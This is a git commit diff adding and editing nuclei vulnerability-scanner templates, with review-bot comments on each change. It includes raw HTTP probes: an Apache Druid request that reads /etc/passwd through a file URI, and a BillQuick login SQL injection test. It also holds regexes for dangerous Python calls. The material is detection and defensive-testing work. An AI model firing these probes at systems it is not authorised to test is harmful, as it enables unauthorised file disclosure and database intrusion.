Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CNVD-2019-06255

patch-1
sandeep 2021-10-26 17:23:01 +05:30
commit 50d1f3753d
19 changed files with 143 additions and 14 deletions

@ -20,10 +20,8 @@ jobs:
- name: Installing Nuclei
# if: steps.cache-go.outputs.cache-hit != 'true'
env:
GO111MODULE: on
run: |
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
shell: bash
- name: Template Validation
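Review bot: switching the install target from `@dev` to `@latest` still does not give a reproducible validation run, since `@latest` moves with every release; if the workflow is meant to validate templates against a known engine, pin a tagged version (e.g. `@v2.x.y`) and bump it deliberately. The commented-out `# if: steps.cache-go.outputs.cache-hit != 'true'` line should either be restored or deleted rather than left as dead configuration.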

@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
**176 directories, 2418 files**.
**177 directories, 2443 files**.
</td>
</tr>

@ -0,0 +1,35 @@
id: CVE-2021-36749
info:
name: Apache Druid Authentication Restrictions Bypass
author: _0xf4n9x_
severity: medium
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
- https://www.cvedetails.com/cve/CVE-2021-36749/
- https://github.com/BrucessKING/CVE-2021-36749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 6.5
cve-id: CVE-2021-36749
cwe-id: CWE-668
tags: cve,cve2021,apache,lfi,auth-bypass
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "druid:*:1000:1000:"
condition: or
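Review bot: the second matcher regex `"druid:*:1000:1000:"` is almost certainly wrong: `:*` means "zero or more colons", so the pattern only matches `druid` followed directly by colons and `1000:1000:`, not a real passwd line with a password field and uid; it should read `druid:.*:1000:1000:` to mirror the first pattern. The classification is also internally inconsistent: the vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` scores 8.8 (High), while `cvss-score: 6.5` and `severity: medium` correspond to a confidentiality-only impact (`C:H/I:N/A:N`); correct whichever field is wrong against the NVD entry already listed in `reference`. Finally, if the spaces inside `" file:///etc/passwd "` and `"no_ such_ column"` in the JSON body are not a rendering artifact, they must be removed, since the padded URI will not be parsed as a file URI and the request will never reach the matcher.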

@ -0,0 +1,64 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
author: dwisiswant0
severity: high
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
- type: xpath
name: VS
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATE']"
- type: xpath
name: VSG
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
- type: xpath
name: EV
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
matchers:
- type: word
part: body
condition: and
words:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"
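Review bot: this template has no `classification` block, unlike the CVE-2021-36749 template in the same commit; add at least `cve-id: CVE-2021-42258` together with the CVSS vector, score and CWE taken from the NVD entry already in `reference`, so the metadata stays consistent across `cve2021` templates. Also consider adding `status: 200` or a `matchers-condition` line to document intent, since the three `words` are already joined by `condition: and` and a reader may otherwise assume the matcher is looser than it is.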

@ -0,0 +1,22 @@
id: redis-commander-exposure
info:
name: Redis Commander Exposure
author: dahse89
severity: low
reference:
- https://joeferner.github.io/redis-commander/
- https://github.com/joeferner/redis-commander
tags: panel,redis
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
condition: and
words:
- "<title>Redis Commander"
- "redisCommanderBearerToken"
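Review bot: the `info` block lacks a `description`; a one-line note that an exposed Redis Commander panel gives whoever reaches it a web front end to the backing Redis instance would let users triage the `low` severity. A `status: 200` matcher combined with `matchers-condition: and` would also avoid firing on error pages or proxies that echo the request path alongside the two words.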

@ -4,7 +4,7 @@ info:
name: Python Scanner
author: majidmc2
severity: info
description: Scan for dangerous Python functions
description: Indicators for dangerous Python functions
reference:
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
@ -17,7 +17,7 @@ file:
extractors:
- type: regex
name: Possible Code Injection
name: code-injection
regex:
- 'exec'
- 'eval'
@ -25,7 +25,7 @@ file:
- type: regex
name: Possible Command Injection
name: command-injection
regex:
- 'subprocess.call\(.*shell=True.*\)'
- 'os.system'
@ -33,18 +33,18 @@ file:
- type: regex
name: Possibly Unpickling untrusted source
name: untrusted-source
regex:
- 'pickle.loads'
- 'cPickle.loads'
- type: regex
name: Possibly loading dangerous YAMLs
name: dangerous-yaml
regex:
- 'yaml.load'
- type: regex
name: Possible SQLi
name: sqli
regex:
- 'cursor.execute'
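Review bot: the renamed extractors are tidier, but the unanchored regexes underneath them are very noisy and deserve the same pass: `'exec'` and `'eval'` match any identifier containing those letters (`execute`, `evaluate`), and `os.system` / `pickle.loads` / `cursor.execute` use an unescaped `.` that matches any character. Tightening them to call sites, e.g. `\bexec\s*\(`, `\beval\s*\(`, `os\.system\s*\(`, would make the new `code-injection` and `command-injection` names accurate. The `sqli` extractor in particular flags every `cursor.execute` call, including parameterised ones, so its name overstates what the pattern detects.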

@ -4,7 +4,7 @@ info:
name: Solar-Log 500 2.8.2 - Incorrect Access Control
author: geeknik
severity: high
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
reference: https://www.exploit-db.com/exploits/49986
tags: solarlog,auth-bypass
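Review bot: the new description drops the truncation but still reads "allows arbitrary remote attackers gain administrative privileges"; it should be "allows remote attackers to gain administrative privileges by connecting to the server." (with the missing "to" and a closing period).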

@ -3,6 +3,7 @@ info:
name: UEditor Arbitrary File Upload
author: princechaddha
severity: high
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
reference:
- https://zhuanlan.zhihu.com/p/85265552
- https://www.freebuf.com/vuls/181814.html
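Review bot: the added description has a run-on and a grammar slip in its second half ("this in turn can be used to make the application to execute their content as code"); suggest "A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, which can in turn lead to the uploaded content being executed as code."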

@ -3,6 +3,7 @@ info:
name: Unauthenticated Spark REST API
author: princechaddha
severity: medium
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
reference: https://xz.aliyun.com/t/2490
tags: spark,unauth
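Review bot: typo in the added description, "accesing" should be "accessing".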

@ -4,6 +4,7 @@ info:
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
author: geeknik
severity: low
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
tags: crlf,viewlinc
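Review bot: the added description is a comma-spliced run-on and "a CRLF character" is imprecise (CRLF is a two-character sequence); suggest "The viewLinc application allows remote attackers to inject a CRLF sequence into responses returned by the product, which allows arbitrary HTTP headers to be added to the response."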

@ -4,6 +4,7 @@ info:
name: Vehicle Parking Management System 1.0 - Authentication Bypass
author: dwisiswant0
severity: high
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
reference: https://www.exploit-db.com/exploits/48877
tags: auth-bypass
requests:
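Review bot: the description states the bypass is achieved through SQL injection in the 'password' parameter, but `tags` only carries `auth-bypass`; add `sqli` so the template is picked up by the same tag filter as the other SQL injection templates in this commit.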

@ -3,6 +3,7 @@ info:
name: WebUI 1.5b6 RCE
author: pikpikcu
severity: critical
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
reference: https://www.exploit-db.com/exploits/36821
tags: webui,rce
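Review bot: subject-verb agreement in the added description, "endpoint contain a vulnerability" should be "endpoint contains a vulnerability".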

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
tags: xss
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
reference:
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
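Review bot: the added description has "response return by the server" (should be "returned") and an awkward tail; suggest "A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary JavaScript into the response returned by the server via the 'email' parameter of the '/guest/users/forgotten' endpoint." (also "JavaScript", not "Javascript").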

@ -4,6 +4,7 @@ info:
name: SMTP WP Plugin Directory listing enabled
author: PR3R00T
severity: high
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: wordpress,wp-plugin
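Review bot: typo in the added description, "acccessible" should be "accessible"; "and its content available for access" can be dropped, since remote accessibility already says that.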

@ -4,6 +4,7 @@ info:
name: WordPress Attitude Themes 1.1.1 Open Redirection
author: 0x_Akoko
severity: low
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020030183
tags: wordpress,wp-theme,redirect
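Review bot: "The WordPress Attitude Themes allows" mixes plural and singular; suggest "The WordPress Attitude theme allows remote attackers to redirect users to an attacker-controlled URL." (hyphenated compound adjective).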

@ -4,6 +4,7 @@ info:
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
author: 0x_Akoko
severity: low
description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020040103
tags: wordpress,wp-plugin,redirect
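Review bot: the `tags` line says `wp-plugin`, but the name and description describe a theme (and the sibling Attitude template in this commit uses `wp-theme`); change it to `wp-theme` so tag-based runs stay correct. Same wording fix as the Attitude template: "The WordPress Weekender Newspaper theme allows remote attackers to redirect users to an attacker-controlled URL."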

@ -3,6 +3,7 @@ info:
name: WordPress accessible wp-config
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
severity: high
description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
tags: wordpress,backup
requests:

@ -4,6 +4,7 @@ info:
name: WordPress Oxygen-Theme Themes LFI
author: 0x_Akoko
severity: high
description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
tags: wordpress,wp-theme,lfi
reference: https://cxsecurity.com/issue/WLB-2019030178
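Review bot: "in its 'download.php' and 'file' parameter" reads as two parameters; suggest "in the 'file' parameter of its 'download.php' script." Also, the other templates in this commit place `reference` before `tags`; keep the same order here for consistency.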

@ -4,7 +4,7 @@ info:
name: wordpress-upload-data
author: pussycat0x
severity: medium
description: Searches for Passwords in the wordpress uploads directory.
description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
reference: https://www.exploit-db.com/ghdb/7040
tags: wordpress,listing
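Review bot: the new description is a clear improvement, but `name: wordpress-upload-data` just repeats the template id; the other templates in this commit use a human-readable name, so something like "WordPress Uploads Directory - Exposed data.txt" would match the convention.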